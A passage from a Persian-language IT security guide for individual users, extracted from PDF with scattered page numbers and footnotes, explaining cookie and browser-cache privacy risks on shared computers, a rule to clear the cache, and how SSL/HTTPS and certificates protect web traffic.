‫ﻧﻈﺎﺭﻩ ﻭ ﻳﺎ ﭘﺎﻙ ﻛﻨﻴﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ ﺍﻳـﻦ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻣﻲﻣﺎﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﻛـﻪ ﻫﻤـﺎﻥ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻭﺑﻲ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﺎﺷﻴﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﻣﻌﺘﺒﺮ ﺷﻤﺎ ﺩﺭ ﻳـﻚ ‪cookie‬‬
‫ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮﻱ ﺑﻪ ﻫﻤﺎﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌـﻪ‬
‫ﻧﻤﺎﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺠﺎﻱ ﺷﻤﺎ ﻭﺍﺭﺩ ﺁﻥ ﭘﺎﻳﮕﺎﻩ‬
‫ﮔــﺮﺩﺩ‪ .‬ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﺩﺍﺭﺩ ﻛــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺫﺧﻴﺮﻩﺷﺪﺓ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﻧﺎﻡ‪ ،‬ﺁﺩﺭﺱ ﻭ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ( ﺭﺍ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﺍﻳﻦ ﻣﻮﺭﺩ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺧـﺼﻮﺻﻲ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ‬
‫‪٨٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‪ ٨٧‬ﻣﺮﻭﺭﮔﺮ ﻭﺏ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﺮﻭﺭﮔﺮ ﺻﻔﺤﻪ ﻳﺎ ﺗـﺼﻮﻳﺮﻱ ﺭﺍ ﺍﺯ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻻ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺻـﻔﺤﺔ ﺩﺭﺣـﺎﻝ‬
‫ﻭﺏ ﺑﺎﺯﻳﺎﺑﻲ ﻣﻲﻛﻨـﺪ ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﻤﺎﻳﺶ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣـﻲﻧﻤﺎﻳـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻣﺠﻤﻮﻋﺔ ﺻﻔﺤﺎﺕ ﻭ ﺗﺼﺎﻭﻳﺮ ﺫﺧﻴﺮﻩﺷﺪﻩ "ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ" ﻧﺎﻣﻴـﺪﻩ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻭ ﺻﻔﺤﺔ‬
‫ﺁﻥ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔـﺮ ﻛـﻞ ﺻـﻔﺤﻪ ﺭﺍ ﺍﺯ‬
‫ﺍﺑﺘﺪﺍ ‪ download‬ﻧﻜﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺁﻥ ﺍﺯ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺻـﻔﺤﺎﺕ ﻭﺑـﻲ ﻛـﻪ ﺩﺭ ﺣﺎﻓﻈـﺔ‬
‫ﻧﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ‪) offline‬ﻳﻌﻨﻲ ﺑﺪﻭﻥ ﺍﺗـﺼﺎﻝ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻧﻴﺰ ﺩﻳﺪﻩ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮﺁﻧﭽﻪ ﺗﻮﺳـﻂ‬
‫ﻣﺮﻭﺭﮔﺮ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﻣـﺎﻟﻲ ﺍﺯ ﻭﺏ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪ‪ ،‬ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ‬
‫ﺷﻤﺎ ﺩﺭ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻣ ﹰ‬
‫ﻼ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ‪.‬‬
‫ﺑﺎﺗﻮﺟﻪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻣﺮﻭﺭ ﻭ ﺍﻧﺪﺍﺯﺓ ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ‪ ،‬ﺍﻳـﻦ ﺻـﻔﺤﺎﺕ ﻭ‬
‫ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ‪.‬‬
‫ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﻭﺏ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻴـﺪ ﺑـﺼﻮﺭﺕ‬
‫ﻣﺘﻦﺳﺎﺩﻩ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺘﻮﺍﻧﺪ ﺍﻳـﻦ‬
‫ﻣﺘﻨﻬﺎ ﺭﺍ ﻣﻴـﺎﻥ ﺭﺍﻩ ﺭﺍ ﺑـﺪﺯﺩ‪ ،‬ﺑـﺮﺍﻱ ﻭﻱ ﻗﺎﺑـﻞ ﻓﻬـﻢ ﻭ ﺧﻮﺍﻧـﺪﻥ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﺑﺨﺸﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻪ ﺷـﻜﻞ ﺑـﻲﺳـﻴﻢ‬
‫ﺑﺎﺷﺪ ﻭ ﻳﺎ ‪ ISP‬ﺍﻧﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻁ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﺪ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ‬
‫ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺭﺍﺣﺖﺗﺮ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺗﻮﺟﻪ ﺑـﻪ ﺁﻥ ﺍﻫﻤﻴـﺖ ﺑـﺴﻴﺎﺭ‬
‫ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﺩﻫﻢ‪:‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺭ ﺻﻔﺤﺔ ﻭﺏ‬
‫ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﻛـﺎﺭ ﺑﺎﻳـﺪ ﺣﺎﻓﻈـﺔ‬
‫ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﮔﺮ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﻫﻴﺪ )ﻣﺜ ﹰﻼ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ(‬
‫ﻧﺒﺎﻳﺪ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ‬
‫ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ )ﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ‬
‫ﺍﻳﻨﺘﺮﻧـﺖ‪ ٨٨‬ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ( ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﭘـﺎﻙ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ ﺍﺟﺎﺯﺓ ﻛﻨﺘﺮﻝ ﻭ ﺣـﺬﻑ ﺣﺎﻓﻈـﺔ ﻧﻬـﺎﻥ ﺭﺍ ﻧﻤـﻲﺩﻫﻨـﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﭘﺎﻙ ﻛﺮﺩﻥ ﺍﻳﻦ ﺣﺎﻓﻈﻪ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ‬
‫ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗـﺎ ﺑـﻪ ﺣـﺎﻝ ﻫـﻴﭻ‬
‫‪Cache‬‬
‫‪Temporary Internet Files‬‬
‫‪87‬‬
‫‪88‬‬
‫ﻣﺮﻭﺭﮔﺮﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﺯ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ ﻣـﻲﺩﻫـﺪ؛‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻭ ﺣﺘـﻲ ﻏﻴـﺮﻣﻤﻜﻦ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ )ﺑﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ‬
‫ﺑﻴــﺸﺘﺮ ﺿــﻤﻴﻤﺔ ‪ ۱‬ﻫﻤــﻴﻦ ﺑﺨــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻧﻤﺎﻳﻴــﺪ(‪ .‬ﻧــﺎﻡ ﭘﺮﻭﺗﻜــﻞ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ "‪ ٨٩"SSL‬ﺍﺳـﺖ‪ .‬ﻣـﻲ ﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ ﭘﻴﺎﻣﻬـﺎﻳﻲ ﻛـﻪ‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ‪ SSL‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺩﺭ ﺍﻛﺜـﺮ ﻣﺮﻭﺭﮔﺮﻫـﺎ‬
‫ﺗﺼﻮﻳﺮ ﻛﻮﭼﻜﻲ ﺍﺯ ﻳﻚ ﻗﻔﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻋـﺎﺩﻱ‬
‫ﭘﻴﺎﻡ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻻﺗﻲ ﺍﺯ ﻧﻮﻉ ‪ SSL‬ﺑﻪ ﺣﺎﻟﺖ ﺑﺴﺘﻪ ﺩﺭ‬
‫ﻣــﻲﺁﻳــﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟــﺖ ‪ URL‬ﺁﻥ ﺻــﻔﺤﻪ ﺑﺠــﺎﻱ "‪ "http‬ﺑــﺎ‬
‫"‪ "https‬ﺁﻏﺎﺯ ﻣﻲﺷـﻮﺩ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻛـﺸﻮﺭﺗﺎﻥ ﺍﻣﻜـﺎﻥ ﺁﻥ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﺑﻬﺘـﺮ ﺍﺳـﺖ ﻫﻤـﻮﺍﺭﻩ ﺍﺯ ﻗـﻮﻱﺗـﺮﻳﻦ ﺭﻭﺵ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻗﻔﻞ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ ﭘﻴﺎﻣﻲ ﻛﻪ ﺍﺯ‬
‫ﻃﺮﻑ ﺷﻤﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺍﺯ ‪ SSL‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪ ،‬ﺍﻣﺎ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺍﮔﺮ ﺻﻔﺤﺔ ﺍﺭﺳﺎﻟﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﭘﻴـﺎﻡ ﺑﺎﺯﮔـﺸﺘﻲ ﻧﻴـﺰ‬
‫ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪ SSL‬ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﺑﺪﺍﻧـﺪ ﻣﺨﺎﻃـﺐ ﺁﻥ‬
‫ﻛﻴــﺴﺖ‪ .‬ﺍﻳــﻦ ﺍﻣــﺮ ﺑــﻪ ﻛﻤــﻚ ﮔــﻮﺍﻫﻲ ﺍﻣﻨﻴﺘــﻲ‪ ٩٠‬ﻭ ﺍﻣــﻀﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ٩١‬ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻭﺏ ﺑﺨﻮﺍﻫﺪ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﺻﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ‪ ،‬ﮔﻮﺍﻫﻲ ﺍﻣﻨﻴﺘﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳـﺪ‪ .‬ﺍﮔـﺮ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺑﺨﻮﺍﻫـﺪ‬
‫‪Secure Socket Layer‬‬
‫‪Security Certificate‬‬
‫‪Digital Signature‬‬
‫‪89‬‬
‫‪90‬‬
‫‪91‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫‪cookie‬ﻫﺎ ﻧﻪ ﺗﻨﻬﺎ ﻳﻚ ﻣﺸﻜﻞ ﺑﺮﺍﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‪،‬‬
‫ﺑﻠﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﻣﺮﻭﺭﮔﺮﻱ ﺩﺭ ﻧﻮﺍﺭ ﺍﺑﺰﺍﺭ ﺧﻮﺩ ﻧﻤﺎﻳﻪﺍﻱ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﻛﻪ ﺑﺎ ﻛﻠﻴﻚ ﺑﺮ‬
‫ﺭﻭﻱ ﺁﻥ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﻮﺩ‪.‬‬
‫‪٨٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺪﺭﺳﺘﻲ ﺑﻪ ﻭﻇﻴﻔﺔ ﺧﻮﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ ﺑﺎﻳﺪ ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﻓﺮﺩﻱ ﻛـﻪ‬
‫ﺩﺭﺧﻮﺍﺳﺖ ﮔﻮﺍﻫﻲ ﻧﻤﻮﺩﻩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋـﺎﻱ‬
‫ﺁﻧﺮﺍ ﺩﺍﺭﺩ‪ .‬ﺳﭙﺲ ﺍﻳﻦ ﻣﺮﻛﺰ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺍﻣـﻀﺎ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺟﺪﺍﻭﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ‬
‫ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻮﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﭘﻴﺎﻣﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴـﺪ‬
‫ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻥ ﻣﻨﻘﻀﻲ‪ ٩٢‬ﺷﺪﻩ ﻳـﺎ ﻣﺘﻌﻠـﻖ‬
‫ﺑﻪ ﻣﻜﺎﻥ ﺩﻳﮕﺮﻱ ﺍﺳﺖ‪ .‬ﺣﺎﻟﺖ ﺍﻭﻝ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻋﺘﺒﺎﺭ‬
‫ﮔﻮﺍﻫﻲ ﺑﺘﺎﺯﮔﻲ ﺑﻪ ﭘﺎﻳﺎﻥ ﺭﺳﻴﺪﻩ ﻭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑـﺮﺍﻱ ﺗﻤﺪﻳـﺪ ﺁﻥ‬
‫ﺑﺎﻳﺪ ﺗﺸﺮﻳﻔﺎﺕ ﺍﺩﺍﺭﻱ ﺗﻤﺪﻳﺪ ﮔﻮﺍﻫﻲ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺩﻭﻡ‬
‫ﻻ ﭘﺎﻳﮕﺎﻩ ﻣﻮﺭﺩ ﻧﻈـﺮ ﺗﻐﻴﻴـﺮ ﻧـﺎﻡ ﺩﺍﺩﻩ ﻭ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺩﺭ‬
‫ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﮔﻮﺍﻫﻲ ﺁﻥ ﻣﻨﻌﻜﺲ ﻧﺸﺪﻩ ﺍﺳﺖ‪ .‬ﺑـﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺧﻮﺍﺳـﺘﺎﺭ‬
‫ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻳﻤﻨﻲ ﻫﺴﺘﻴﺪ ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﺑﺎﻳﺪ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ‬
‫ﻣﺸﻜﻞ ﺑﮕﻮﻧﻪﺍﻱ ﺭﻓﻊ ﺷﻮﺩ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺧﻮﺩ ﺑﺎ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺧﺎﺗﻤـﻪ‬
‫ﺩﻫﻴﺪ‪.‬‬
‫ﺁﻳﺎ ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ ﻛﺎﻓﻲ ﺍﺳﺖ؟‬
‫ﻳﻚ ﻗﻔﻞ ﻛﻮﭼﻚ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻣـﻦ ﺩﺭ ﻭﺏ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﻭ‬
‫ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻧﺘﻘـﺎﻝ ﺗﻨﻬـﺎ‬
‫ﻣﻮﺭﺩﻱ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ‬
‫ﮔﻴﺮﺩ‪ .‬ﺗﻨﻬﺎ ﺩﺭﺻﺪ ﻛﻤﻲ ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻳﺎ ﺳﺮﻗﺘﻬﺎﻱ ﻫﻮﻳﺖ ﺩﺭ‬
‫ﺍﺛﺮ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺍﻣﻦ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭﺻﺪ ﻋﻤﺪﺓ ﻣﺴﺎﺋﻞ ﻣـﻮﺍﺭﺩﻱ‬
‫ﻫﺴﺘﻨﺪ ﭼﻮﻥ‪:‬‬
‫•‬
‫•‬
‫•‬
‫ﻓﻘﺪﺍﻥ ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺑﻌﻀﻲ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ؛‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺷﺨﺼﻲ؛‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ‪.‬‬
‫ﺍﺳﺘﺜﻨﺎﻱ ﺍﺻﻠﻲ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ "ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳـﻴﻢ" ﺍﺳـﺖ ﻛـﻪ ﺩﺭ‬
‫ﺑﺨﺶ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
